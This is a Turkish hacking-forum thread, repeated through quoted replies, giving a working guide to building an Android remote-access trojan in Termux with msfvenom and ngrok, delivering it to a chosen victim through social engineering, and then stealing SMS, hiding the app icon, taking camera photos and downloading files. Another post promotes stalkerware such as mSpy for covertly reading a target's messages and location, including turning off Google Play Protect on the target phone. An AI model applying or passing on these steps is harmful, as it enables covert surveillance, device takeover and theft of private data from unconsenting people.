Andori̇d telefonlara telefondan trojan rat atma

Doctordied' Alıntı:

Merhaba,
Telefonunuz üzerinden Termux yazılımını kullanarak bir trojan oluşturabilirsiniz. Trojani de karşı tarafa sosyal mühendislik tarafından kandırıp yükletirseniz, trojanı dinlemeye başlayabilirsiniz.

Genişletmek için tıkla ...

Nostral' Alıntı:

server satin alip rdp client uygulamasi ile baglanip normal bilgisayar gibi kullanabilirsin

Genişletmek için tıkla ...

Profesör' Alıntı:

Merhaba değerli üye,

Termux üzerinden yapmanız mümkün.

Sırayla neleri anlatacağım

1)Metasploit,Trojen,Ngrok tanımları anlatılacak

2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum

3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur



1)

Metasploit,Trojen,Ngrok kavramları nedir?



A)Trojen nedir

B)Metploit nedir

C)Ngrok nedir



A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:



Veri silme

Veri engelleme

Veri değiştirme

Veri kopyalama

Bilgisayarların veya bilgisayar ağlarının performansını düşürme

Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz

B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.

C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)

2)

Metasploit ve Ngrokun nasıl kurulur?



A)Metasploit nasıl kurulur?

B)Ngrok nasıl kurulur?


A)Metasploiti kuralım;

Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin

Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz

bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin

kodlara gelelim

bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce

termux-change-repo

komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda

(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)

1-pkg install git -y

2-git clone GitHub - jokzilla/metakurucu

3-cd metakurucu

4-chmod +x *

5-bash metakurucu.sh

toolumuz indi 1i seçiyoruz ve kurulum başladı

termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz

burdaki işlemimiz bu kadar şimdi ngroku kuralım

B)Ngroku kuralım;

termuxu tekrar açıyoruz

1-pkg install git -y

2-git clone GitHub - termuxxtoolss/NGROK-KURULUM

3-cd NGROK-KURULUM

4-chmod 777 ngrok-kurulum.sh

5-bash ngrok-kurulum.sh



ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;

ngrok - secure introspectable tunnels to localhost

kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)



3)

Trojen nasıl oluturulur;


ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki



online yazan yer kırmızı olursa demeki sorun vardır

ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir

termux-setup-storage

depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için

soldan kaydırarak new sesion diyoruz



resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)



msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve

trojaniniz sdcard(dahili hafızaya kaydoldu)



TROJENİ DİNLEMEYE ALALIM





msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından

Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;



use exploit/multi/handler




burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;


set payload android/meterpreter/reverse_tcp




Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;


set LHOST 127.0.0.1




Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"

yazdığımız yere burdaki sayıyı alıyoruz "1275"

set LPORT 1275







ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)





help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar



İŞİNİZE YARIYACAK BAZI KOMUTLAR

Kurbanın telefonundan telefonunuza SMS alın:

Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.

dump_sms



Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:

Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.

hide_app_icon



Kurbanın telefonunun ses modunu değiştirin:

aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.

set_audio_mode -m 1

telefonu sessize almak için;

set_audio_mode -m 0



Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.

webcam_snap



Kurbanların dosya depolamasına erişin:

Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz

cd /sdcard



Kurbanın telefonundan herhangi bir dosyayı indirin:

karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın

download file-name

Genişletmek için tıkla ...

Blackrik' Alıntı:

Oncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim

Genişletmek için tıkla ...

ERSSE' Alıntı:

bilgilerin sana gelemsi gerek

Genişletmek için tıkla ...

Blackrik' Alıntı:

Oncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim

Genişletmek için tıkla ...

Blackrik' Alıntı:

Oncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim

Genişletmek için tıkla ...

Profesör' Alıntı:

Merhaba değerli üye,

Trojan yerine kleylogger atmayı deneyebilirsiniz.

Merhaba değerli üye;



kendi telefonuna keylogger kurabilirsin.Aşağıdaki keylogger çeşitlerine bakabilirsiniz.



MSpy


Tanıştırayım: mSpy. Casus programı olarak da geçen bu özel yazılım klavye ve ekran kaydı için kullanabileceğin yazılımlardan yalnızca biri. Bu yazılım aracılığıyla, hedef telefondaki tüm klavye ve ekran hareketlerini görüntüleyebilir ve ekran kaydını alabilirsin. Bu da demek oluyor ki tüm şifreler, yazışmalar ve çok daha fazlası parmaklarının ucunda olacak.



Gibi birçok yazışmayı da inceleme şansı veriyor:



Whatsapp konuşmaları,
gelen ve giden SMS’ler,
Messenger sohbetleri.
Böylece kimlerle ve hangi zaman diliminde bu yazışmaların gerçekleştiğini de gözlemleyebilirsin.



mSpy; aynı zamanda günümüzün vazgeçilmezi olan sosyal medya kanallarına tam erişim sağlar. Böylece hedef telefona yüklenmiş; Facebook, Twitter, Instagram ve daha birçok sosyal ağ uygulamasını dilediğin şekilde incelemeni ve kaydetmeni sağlar.



mSpy keylogger



Kolay ve etkin GPS takibi için yine mSpy’a güvenebilirsin. Yedi gün yirmi dört saat boyunca hedef cihazın konumunu canlı olarak takip edebildiğin gibi, coğrafya çerçeveleme özelliği sayesinde kişi senin belirleyeceğin sınırları aştığında ilgili cihazdan bildirim alabilirsin. Bunun yalnızca mSpy’a has bir özellik olduğunu da ekleyip diğer Android keylogger programlarına göz atalım…



SpyBubble
Klavye dinlemeyle yetinmeyenlere çok daha geniş çözümler sunan SpyBubble, bir casus yazılım olarak da biliniyor. Masaüstü bilgisayarlarda, online bir panel üzerinden hedeflenen cihazı takip etmeye yarayan bu yazılım aynı zamanda hedeflenen cihazla ilgili verileri edinmeye de yarıyor.



GPS üzerinden canlı konum takibi, gelen ve giden aramaların takibi, SMS takibi, Whatsapp mesajlarını okuma, cihazda yer alan fotoğraf ve videolara erişim gibi birçok özelliği tek bir çatı altında sunuyor.



Keylogger bulmak için gezinmene gerek yok, SpyBubble klavye kontrol özelliği ile diğer keylogger programlarının sahip olduklarını ve çok daha fazlasını kullanıcılarına vaat ediyor. Piyasada da başarısını kanıtlamış nadir programlardan biri olan SpyBubble, keylogger atma işlemi için de rahatlıkla güvenebileceğin bir hizmet sunuyor.



MobileSpy
Gelelim üçüncü ve son önerimize. Telefone keylogger atma işlemlerini gerçekleştirmek için yararlanabileceğin bu özel yazılım, diğerlerinden farklı olarak online kontrol panelini dilediğin cihazdan görüntülemeni sağlıyor. Yani yalnızca masaüstünden değil; tablet, akıllı telefon ve diğer tüm akıllı cihazlardan görüntüleme gerçekleştirebilirsin.



Keylogger Kullanarak Hangi Bilgileri Görülebilir?
Her keylogger atma programı farklı çalışsa da birçok ortak özelliğe sahip oldukları da bir gerçektir. Keylogger programlarının temel amacı “klavyeyi dinlemek”tir. Diğer bir deyişle klavyede gerçekleşen tüm etkinlikleri kayıt altına almak ve bu sayede hedef cihazdaki bilgileri kopyalamak veya saklamaktır.



Çoğunlukla şifrelerin hacklenmesi, eposta ve mesaj kutularına erişim gibi amaçlarla kullanılsa da bu programların yetenekleri oldukça gelişmiştir. Şimdi bu yeteneklerin bazılarından bahsedelim, yani keylogger kullanarak hangi bilgileri görüntüleyebileceğini inceleyelim:



SMS Mesajları. Yukarıda kısaca bahsetmiştik ancak tekrar ele almamızda sakınca bulunmuyor. Keylogger programları yalnızca klavye dinlemeden ibaret değil. Onu önemli hale getiren özelliklerden biri de gelen, giden veya kaydedilen mesajları incelemeye olanak vermesi. Keylogger programları böylece hedef cihaz üzerinde bulunan tüm SMS mesajlarının içeriğini, tarihlerini ve uzunluklarını kontrol etme şansı sunuyor.
E-postalar. Hedef cihaza gelen ve cihazdan başka bir cihaza gönderilen tüm e-postaları inceleme olanağı sunan keylogger programları, e-posta eklerinde yer alan dosyalar ve yazışmalarım tamamını kontrol etmene yardımcı olur. Tıpkı SMS mesajları gibi burada da gelen ve giden tüm e-posta içeriklerini tek tek inceleyebilirsin.
Sosyal Ağlardaki Veriler. Tüm derdimiz mesajlar değil elbette. Elimizden hiç düşürmediğimiz telefonlarımızın baş tacı sosyal ağlardaki veriler de son derece ilgi çekici. Keylogger programları aracılığıyla telefonda yer alan tüm sosyal ağlara erişebilir ve bu ağlardaki tüm aktiviteleri kayıt altına alabilirsin. Yani her bir paylaşım avcunun içinde olacak.
Konum Bilgileri. Android keylogger programları, hedef telefon üzerinden GPS yardımıyla cihazın konumunu 7 gün 24 saat boyunca takip etmeni mümkün hale getirir. Böylece dilediğin zaman cihazın konum bilgilerine de erişebilirsin. Eğer kullanıcı konum bilgilerini gizli tutmadıysa önceki konum bilgilerine erişmen de mümkün.
Android İçi Keylogger Nasıl Yüklenir Ve Kullanılır?
Android keylogger uygulaması indirmek ve kurmak sandığından da basit. Bu basit adımları tek tek ve sırayla uygulayalım.



Android keylogger programları, tıpkı iPhone cihazlarda olduğu gibi hızlı ve kolayca kurulabilir. İlk olarak hedeflediğin telefona erişimin olmalı. Telefonu eline aldıktan sonra, ilk iş olarak telefondaki Google Play korumasını kaldıracak adımları tamamlamalısın. Bu dilediğin uygulamayı daha rahat şekilde yüklemene yardımcı olacak. Bu işlemi yapmak için




Ayarlar
Google
Güvenlik
Google Play Koruması
dizinini takip etmen gerekiyor.



Sıra indirme dosyasını telefona indirmekte. Bunun için telefonun internet tarayıcısını açarak b33w.net/a adresine gitmeli ve “.apk” uzantılı dosyayı indirmelisin. Bu dosya aracılığı ile yükleme işlemin de başlamış olacak. Yükleme işlemi tamamlandıktan sonra mSpy’ı satın aldıktan sonra sana verilen kayıt kodu ile işlemi sonlandırabilirsin. Artık dilediğin yer ve dilediğin zamanda hedef cihazını izlemeye hazırsın!

Genişletmek için tıkla ...

Nostral' Alıntı:

mspy kurmak icin telefona direk fiziksel olarak erismen gerek cunku uygulamayi yukledikten sonra ayar yapiyorsun direk calismiyor

Genişletmek için tıkla ...

Profesör' Alıntı:

Merhaba değerli üye,

Termux üzerinden yapmanız mümkün.

Sırayla neleri anlatacağım

1)Metasploit,Trojen,Ngrok tanımları anlatılacak

2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum

3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur



1)

Metasploit,Trojen,Ngrok kavramları nedir?



A)Trojen nedir

B)Metploit nedir

C)Ngrok nedir



A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:



Veri silme

Veri engelleme

Veri değiştirme

Veri kopyalama

Bilgisayarların veya bilgisayar ağlarının performansını düşürme

Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz

B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.

C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)

2)

Metasploit ve Ngrokun nasıl kurulur?



A)Metasploit nasıl kurulur?

B)Ngrok nasıl kurulur?


A)Metasploiti kuralım;

Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin

Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz

bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin

kodlara gelelim

bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce

termux-change-repo

komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda

(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)

1-pkg install git -y

2-git clone GitHub - jokzilla/metakurucu

3-cd metakurucu

4-chmod +x *

5-bash metakurucu.sh

toolumuz indi 1i seçiyoruz ve kurulum başladı

termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz

burdaki işlemimiz bu kadar şimdi ngroku kuralım

B)Ngroku kuralım;

termuxu tekrar açıyoruz

1-pkg install git -y

2-git clone GitHub - termuxxtoolss/NGROK-KURULUM

3-cd NGROK-KURULUM

4-chmod 777 ngrok-kurulum.sh

5-bash ngrok-kurulum.sh



ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;

ngrok - secure introspectable tunnels to localhost

kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)



3)

Trojen nasıl oluturulur;


ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki



online yazan yer kırmızı olursa demeki sorun vardır

ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir

termux-setup-storage

depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için

soldan kaydırarak new sesion diyoruz



resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)



msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve

trojaniniz sdcard(dahili hafızaya kaydoldu)



TROJENİ DİNLEMEYE ALALIM





msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından

Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;



use exploit/multi/handler




burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;


set payload android/meterpreter/reverse_tcp




Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;


set LHOST 127.0.0.1




Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"

yazdığımız yere burdaki sayıyı alıyoruz "1275"

set LPORT 1275







ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)





help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar



İŞİNİZE YARIYACAK BAZI KOMUTLAR

Kurbanın telefonundan telefonunuza SMS alın:

Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.

dump_sms



Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:

Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.

hide_app_icon



Kurbanın telefonunun ses modunu değiştirin:

aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.

set_audio_mode -m 1

telefonu sessize almak için;

set_audio_mode -m 0



Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.

webcam_snap



Kurbanların dosya depolamasına erişin:

Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz

cd /sdcard



Kurbanın telefonundan herhangi bir dosyayı indirin:

karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın

download file-name

Genişletmek için tıkla ...

b.rsn' Alıntı:

ios ta nasıl yapabilirim

Genişletmek için tıkla ...

Profesör' Alıntı:

Merhaba değerli üye,

Termux üzerinden yapmanız mümkün.

Sırayla neleri anlatacağım

1)Metasploit,Trojen,Ngrok tanımları anlatılacak

2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum

3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur



1)

Metasploit,Trojen,Ngrok kavramları nedir?



A)Trojen nedir

B)Metploit nedir

C)Ngrok nedir



A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:



Veri silme

Veri engelleme

Veri değiştirme

Veri kopyalama

Bilgisayarların veya bilgisayar ağlarının performansını düşürme

Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz

B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.

C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)

2)

Metasploit ve Ngrokun nasıl kurulur?



A)Metasploit nasıl kurulur?

B)Ngrok nasıl kurulur?


A)Metasploiti kuralım;

Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin

Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz

bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin

kodlara gelelim

bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce

termux-change-repo

komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda

(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)

1-pkg install git -y

2-git clone GitHub - jokzilla/metakurucu

3-cd metakurucu

4-chmod +x *

5-bash metakurucu.sh

toolumuz indi 1i seçiyoruz ve kurulum başladı

termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz

burdaki işlemimiz bu kadar şimdi ngroku kuralım

B)Ngroku kuralım;

termuxu tekrar açıyoruz

1-pkg install git -y

2-git clone GitHub - termuxxtoolss/NGROK-KURULUM

3-cd NGROK-KURULUM

4-chmod 777 ngrok-kurulum.sh

5-bash ngrok-kurulum.sh



ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;

ngrok - secure introspectable tunnels to localhost

kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)



3)

Trojen nasıl oluturulur;


ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki



online yazan yer kırmızı olursa demeki sorun vardır

ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir

termux-setup-storage

depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için

soldan kaydırarak new sesion diyoruz



resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)



msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve

trojaniniz sdcard(dahili hafızaya kaydoldu)



TROJENİ DİNLEMEYE ALALIM





msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından

Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;



use exploit/multi/handler




burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;


set payload android/meterpreter/reverse_tcp




Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;


set LHOST 127.0.0.1




Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"

yazdığımız yere burdaki sayıyı alıyoruz "1275"

set LPORT 1275







ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)





help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar



İŞİNİZE YARIYACAK BAZI KOMUTLAR

Kurbanın telefonundan telefonunuza SMS alın:

Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.

dump_sms



Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:

Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.

hide_app_icon



Kurbanın telefonunun ses modunu değiştirin:

aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.

set_audio_mode -m 1

telefonu sessize almak için;

set_audio_mode -m 0



Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.

webcam_snap



Kurbanların dosya depolamasına erişin:

Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz

cd /sdcard



Kurbanın telefonundan herhangi bir dosyayı indirin:

karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın

download file-name

Genişletmek için tıkla ...

KARAFBEY' Alıntı:

msfconsole yazdıktan sonra could not find pg-1.2.3 in any of the sources run 'bundle install' to install missing gems hatasını alıyorum neden?

Genişletmek için tıkla ...